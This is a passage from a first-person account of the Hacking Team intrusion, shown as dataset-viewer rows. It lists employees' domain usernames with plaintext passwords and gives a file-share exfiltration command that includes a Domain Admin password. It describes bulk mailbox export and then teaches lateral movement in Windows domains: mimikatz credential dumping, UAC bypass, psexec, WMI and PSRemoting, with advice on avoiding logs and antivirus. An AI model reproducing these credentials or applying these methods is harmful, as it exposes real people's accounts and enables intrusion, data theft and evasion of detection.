text stringlengths 0 1.99k |
|---|
HACKINGTEAM d.milan set!dob66 |
HACKINGTEAM w.furlan Blu3.B3rry! |
HACKINGTEAM d.romualdi Rd13136f@# |
HACKINGTEAM l.invernizzi L0r3nz0123! |
HACKINGTEAM e.ciceri 2O2571&2E |
HACKINGTEAM e.rabe erab@4HT! |
[1] https://github.com/Neohapsis/creddump7 |
[2] http://proxychains.sourceforge.net/ |
[3] https://www.samba.org/ |
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf |
[5] https://github.com/gentilkiwi/mimikatz |
--[ 11 - Downloading the mail ]------------------------------------------------- |
With the Domain Admin password, I have access to the email, the heart of the |
company. Since with each step I take there's a chance of being detected, I |
start downloading their email before continuing to explore. Powershell makes |
it easy [1]. Curiously, I found a bug with Powershell's date handling. After |
downloading the emails, it took me another couple weeks to get access to the |
source code and everything else, so I returned every now and then to download |
the new emails. The server was Italian, with dates in the format |
day/month/year. I used: |
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')} |
with New-MailboxExportRequest to download the new emails (in this case all |
mail since June 5). The problem is it says the date is invalid if you |
try a day larger than 12 (I imagine because in the US the month comes first |
and you can't have a month above 12). It seems like Microsoft's engineers only |
test their software with their own locale. |
[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/ |
--[ 12 - Downloading Files ]---------------------------------------------------- |
Now that I'd gotten Domain Admin, I started to download file shares using my |
proxy and the -Tc option of smbclient, for example: |
proxychains smbclient '//192.168.1.230/FAE DiskStation' \ |
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*' |
I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in |
the torrent like that. |
--[ 13 - Introduction to hacking windows domains ]------------------------------ |
Before continuing with the story of the "weones culiaos" (Hacking Team), I |
should give some general knowledge for hacking windows networks. |
----[ 13.1 - Lateral Movement ]------------------------------------------------- |
I'll give a brief review of the different techniques for spreading withing a |
windows network. The techniques for remote execution require the password or |
hash of a local admin on the target. By far, the most common way of obtaining |
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords |
and sekurlsa::msv, on the computers where you already have admin access. The |
techniques for "in place" movement also require administrative privileges |
(except for runas). The most important tools for privilege escalation are |
PowerUp [2], and bypassuac [3]. |
[1] https://adsecurity.org/?page_id=1821 |
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp |
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1 |
Remote Movement: |
1) psexec |
The tried and true method for lateral movement on windows. You can use |
psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's |
invoke_psexec [4], or the builtin windows command "sc" [5]. For the |
metasploit module, powershell empire, and pth-winexe [6], you just need the |
hash, not the password. It's the most universal method (it works on any |
windows computer with port 445 open), but it's also the least stealthy. |
Event type 7045 "Service Control Manager" will appear in the event logs. In |
my experience, no one has ever noticed during a hack, but it helps the |
investigators piece together what the hacker did afterwards. |
2) WMI |
The most stealthy method. The WMI service is enabled on all windows |
computers, but except for servers, the firewall blocks it by default. You |
can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and |
pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin |
wmic [5]. All except wmic just need the hash. |
3) PSRemoting [10] |
It's disabled by default, and I don't recommend enabling new protocols. |
But, if the sysadmin has already enabled it, it's very convenient, |
especially if you use powershell for everything (and you should use |
powershell for almost everything, it will change [11] with powershell 5 and |
windows 10, but for now powershell makes it easy to do everything in RAM, |
avoid AV, and leave a small footprint) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.